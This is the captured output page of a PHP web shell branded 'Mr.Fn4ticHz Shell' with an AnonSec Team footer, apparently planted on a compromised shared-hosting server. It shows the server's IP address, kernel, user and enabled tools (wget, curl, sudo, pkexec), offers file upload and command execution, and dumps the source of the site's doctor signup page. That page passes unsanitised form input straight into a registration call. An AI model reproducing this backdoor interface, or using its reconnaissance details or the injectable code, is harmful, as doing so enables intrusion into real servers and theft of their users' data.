Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.227.111.197
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//rmo_add.php
<?php 
session_start();
require_once('../LoginManager.php');
require_once('../DBManager.php');
include('menu.php');
include('header.php');

?>



<!DOCTYPE html>
<html lang="en">
<script src="https://code.jquery.com/jquery-2.1.1.min.js" type="text/javascript"></script>
      
<script>
function checkAvailability() {
	$("#loaderIcon").show();
	jQuery.ajax({
	url: "rmo_check.php",
	data:'uname='+$("#userid").val(),
	type: "POST",
	success:function(data){
		$("#user-availability-status").html(data);
		$("#loaderIcon").hide();
	},
	error:function (){}
	});
}
</script>
<script>
      function isNumber(evt) {
  evt = (evt) ? evt : window.event;
  var charCode = (evt.which) ? evt.which : evt.keyCode;
  if (charCode > 31 && (charCode < 48 || charCode > 57)) {
    alert("Please enter only Numbers.");
    return false;
  }

  return true;
}

function ValidateNo() {
  var phoneNo = document.getElementById('numbers');

  if (phoneNo.value == "" || phoneNo.value == null) {
    alert("Please enter your Mobile No.");
    return false;
  }
  if (phoneNo.value.length < 10 || phoneNo.value.length > 10) {
    alert("Mobile No. is not valid, Please Enter 10 Digit Mobile No.");
    return false;
  }

  
  return true;
}
</script>
<script src="
https://cdn.jsdelivr.net/npm/sweetalert2@11.10.0/dist/sweetalert2.all.min.js
"></script>
<link href="
https://cdn.jsdelivr.net/npm/sweetalert2@11.10.0/dist/sweetalert2.min.css
" rel="stylesheet">
 <?php 
 if(isset($_POST['signup']))
{
LoginManager::registerrmo("$_POST[Name]","$_POST[userid]","$_POST[education]","$_POST[regi_number]","$_POST[numbers]","$_POST[entered_by]");


 if(isset($_SESSION['status']) && $_SESSION['status']!=''){
    ?>
     <script>
     Swal.fire({
  title: "<?php echo $_SESSION['status'] ?>",
//  text: "You clicked the button!",
  icon: "<?php echo $_SESSION['status_code'] ?>"
});
 </script> 
    <?php
    unset($_SESSION['status']);
}
  }  ?> 



    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>

     <script type="text/javascript">
$(document).ready(function(){
    $('#myForm').submit(function() {
     $('#loaderImg').show(); 
      return true;
    });
});
  </script>
<style>
      #loaderImg {
         position: absolute;
         top: 0;
         bottom: 0;
         left: 0;
         right: 0; 
         margin: auto;
         border: 10px solid grey;
         border-radius: 50%;
         border-top: 10px solid black;
         width: 100px;
         height: 100px;
         animation: spin 1s linear infinite;
      }
      @keyframes spin {
         0% {
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
         }
         100% {
            -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
         }
      }
   </style>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<title> Pt Signup</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="new2.css">
</head>
<body>
   
    <div class="content-wrapper">
        <section class="content-header">
         
<!-- Page Preloder -->

 <div style = "display:none;" id = "loaderImg"> <div class="loader"> </div> </div>
<form name="signup" method="post" id="myForm" name="myForm">
    	<h3><i class="fa fa-angle-right"></i> Duty Doctor Access   </h3>
    
    	       	   <label for="item">  Name <span>*</span></label>
<input class="input100" type="text" name="Name" placeholder="Enter your Name" required>
    	        	   <div id="frmCheckUsername">
 <label for="item"> Email id<span>*</span></label>
<input class="input100" type="email" name="userid" id="userid" placeholder="Enter Your Email id" class="demoInputBox" onBlur="checkAvailability()" required>
  <span id="user-availability-status"></span>    

<p><img src="LoaderIcon.gif" id="loaderIcon" style="display:none" /></p>
</div>
<label for="item"> Mobile Number<span>*</span></label>
 <input type="text"  name="numbers" id="numbers" onkeypress="return isNumber(event)" required>
 <label for="item"> Education<span>*</span></label>
<input onclick="ValidateNo();" class="input100" type="text" name="education" placeholder="Enter Your Highest Education" required>
 <label for="item"> Registration Number<span>*</span></label>
<input onclick="ValidateNo();" class="input100" type="text" name="regi_number" placeholder="Enter Your Registration Number" >

   
 <input type="submit" id="clicknow" value="Submit" name="signup">
</form>
</div>>
</body>


</html>

Anon7 - 2022
AnonSec Team